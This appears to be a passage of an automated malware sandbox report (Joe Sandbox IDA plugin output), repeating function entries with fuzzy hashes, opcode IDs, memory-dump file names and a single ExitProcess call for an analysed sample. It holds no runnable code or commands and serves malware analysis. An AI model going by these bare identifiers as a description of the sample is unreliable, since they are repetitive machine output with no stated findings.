                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 650236B1D092A89AF7208B24DC447EA7BB4EF51304F0441FAD84DA7282D67E5FC5CB96
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2154192327.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154165853.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154283981.0000000000525000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154339002.00000000005A8000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154361694.00000000005AA000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154452037.00000000005AB000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154474637.00000000005B2000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154518138.00000000005CA000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154563942.0000000000633000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154599755.0000000000664000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154599755.0000000000666000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154651763.000000000066A000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154675812.0000000000673000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154697515.0000000000676000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154721890.000000000067D000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154745993.0000000000680000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154767280.0000000000689000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154791817.000000000068E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154906339.00000000006BC000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154930760.00000000006C0000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_400000_h687rYoqxN2Ss_wvNXD9qqhf.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 3849$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                                                                                                                                                                                                                          • API String ID: 0-829924176
                                                                                                                                                                                                                                          • Opcode ID: fa7f2ea7d06a1c11f4c3c7b418b5ab40c488cf3c469cda7af914d479c4175b81
                                                                                                                                                                                                                                          • Instruction ID: 375ac688da5934b688f4bcb78b3944943b62ad60df6e06d8cd5dc98f8d8c3c95
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa7f2ea7d06a1c11f4c3c7b418b5ab40c488cf3c469cda7af914d479c4175b81
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19F135B2D082A89AF7208625DC447DA7BB5EF91304F0441FAC44D67282D67E5FC6CBA7
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2154192327.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154165853.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154283981.0000000000525000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154339002.00000000005A8000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154361694.00000000005AA000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154452037.00000000005AB000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154474637.00000000005B2000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154518138.00000000005CA000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154563942.0000000000633000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154599755.0000000000664000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154599755.0000000000666000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154651763.000000000066A000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154675812.0000000000673000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154697515.0000000000676000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154721890.000000000067D000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154745993.0000000000680000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154767280.0000000000689000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154791817.000000000068E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154906339.00000000006BC000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154930760.00000000006C0000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_400000_h687rYoqxN2Ss_wvNXD9qqhf.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 3849$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                                                                                                                                                                                                                          • API String ID: 0-829924176
                                                                                                                                                                                                                                          • Opcode ID: 5add19f7e8998525be6cf22f90b47c0ff67255d3f501afb9e6df6ed236ec3386
                                                                                                                                                                                                                                          • Instruction ID: e23a1f506a077f573dc430d5e8b10672cd4dc9a3115a4b21629f4a620024b0ca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5add19f7e8998525be6cf22f90b47c0ff67255d3f501afb9e6df6ed236ec3386
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EF145B2D082A88AF7208A25DC447DA7BB5EF51300F0441FAC44D67282D67E5FC6CBA7
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 00422E04
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2154192327.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154165853.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154283981.0000000000525000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154339002.00000000005A8000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154361694.00000000005AA000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154452037.00000000005AB000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154474637.00000000005B2000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154518138.00000000005CA000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154563942.0000000000633000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154599755.0000000000664000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154599755.0000000000666000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154651763.000000000066A000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154675812.0000000000673000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154697515.0000000000676000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154721890.000000000067D000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154745993.0000000000680000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154767280.0000000000689000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154791817.000000000068E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154906339.00000000006BC000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154930760.00000000006C0000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_400000_h687rYoqxN2Ss_wvNXD9qqhf.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExitProcess
                                                                                                                                                                                                                                          • String ID: E$L$L$P$W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                                                                                                          • API String ID: 621844428-215400123
                                                                                                                                                                                                                                          • Opcode ID: f5e13ccb45dd7d6eb88af039670a6e5ed4f7f518b2fec543e20f266a5a1c674a
                                                                                                                                                                                                                                          • Instruction ID: 7fa9d3f87a69afe4ac10df2f2e8729f5830c8626a82bf2b8b5b51c3dd01773f7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f5e13ccb45dd7d6eb88af039670a6e5ed4f7f518b2fec543e20f266a5a1c674a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF9108A1D092A8DEF7208624DC447DB7AB5EF51304F1481FAC44C57682DABE4FC98BA6
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2154192327.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154165853.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154283981.0000000000525000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154339002.00000000005A8000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154361694.00000000005AA000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154452037.00000000005AB000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154474637.00000000005B2000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154518138.00000000005CA000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154563942.0000000000633000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154599755.0000000000664000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154599755.0000000000666000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154651763.000000000066A000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154675812.0000000000673000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154697515.0000000000676000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154721890.000000000067D000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154745993.0000000000680000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154767280.0000000000689000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154791817.000000000068E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154906339.00000000006BC000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154930760.00000000006C0000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_400000_h687rYoqxN2Ss_wvNXD9qqhf.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 3849$L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                                                                                                          • API String ID: 0-4127283393
                                                                                                                                                                                                                                          • Opcode ID: 1b4a806f4aed8c27872cd381f6375e33a2eebbe9e1d627def979598e3a4133b5
                                                                                                                                                                                                                                          • Instruction ID: ad54936cff26b5a14aaa063f3c186eac5bd1450ecfe14e0f19b3fdc36f8b754a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b4a806f4aed8c27872cd381f6375e33a2eebbe9e1d627def979598e3a4133b5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4A102B1D042688AE710CB24DC407EA7BB5EF95304F0481FAC44DA7281D67E5FD5CB9A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2154192327.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154165853.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154283981.0000000000525000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154339002.00000000005A8000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154361694.00000000005AA000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154452037.00000000005AB000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154474637.00000000005B2000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154518138.00000000005CA000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154563942.0000000000633000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154599755.0000000000664000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154599755.0000000000666000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154651763.000000000066A000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154675812.0000000000673000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154697515.0000000000676000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154721890.000000000067D000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154745993.0000000000680000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154767280.0000000000689000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154791817.000000000068E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154906339.00000000006BC000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154930760.00000000006C0000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_400000_h687rYoqxN2Ss_wvNXD9qqhf.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 3849$L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                                                                                                          • API String ID: 0-4127283393
                                                                                                                                                                                                                                          • Opcode ID: 9bc5dfb5308e3dc0ff13c6cff22d55b6307f5aa29179759bab47606634119b2e
                                                                                                                                                                                                                                          • Instruction ID: 10e8b92dca063b1a5366c645984053d040c501b3dacb8044bc5d5dca4ae1d023
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9bc5dfb5308e3dc0ff13c6cff22d55b6307f5aa29179759bab47606634119b2e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E68126B1D092A89AE710CA24DC447EA7BB5EF55300F0481FAD44DA7281D67E5FC1CBAA
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 00422E04
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000F.00000002.2154192327.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154165853.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154283981.0000000000525000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154339002.00000000005A8000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154361694.00000000005AA000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154452037.00000000005AB000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154474637.00000000005B2000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154518138.00000000005CA000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154563942.0000000000633000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154599755.0000000000664000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154599755.0000000000666000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154651763.000000000066A000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154675812.0000000000673000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154697515.0000000000676000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154721890.000000000067D000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154745993.0000000000680000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154767280.0000000000689000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154791817.000000000068E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154906339.00000000006BC000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 0000000F.00000002.2154930760.00000000006C0000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_400000_h687rYoqxN2Ss_wvNXD9qqhf.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExitProcess
                                                                                                                                                                                                                                          • String ID: E$L$L$P$W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                                                                                                          • API String ID: 621844428-215400123
                                                                                                                                                                                                                                          • Opcode ID: 64c9cdcc7045fca1891305a949c295ee54d2b1107aeca09793d00c2c4ef9d5ad
                                                                                                                                                                                                                                          • Instruction ID: a7e01ed0c0b784834eabc728cadb031209eee85b7cf6a95f8d00e9632e634018
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64c9cdcc7045fca1891305a949c295ee54d2b1107aeca09793d00c2c4ef9d5ad
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B481E971D092A8CAFB20C624DC447DA7BB5EF51304F1481FAC44C57682DABE4FC98B66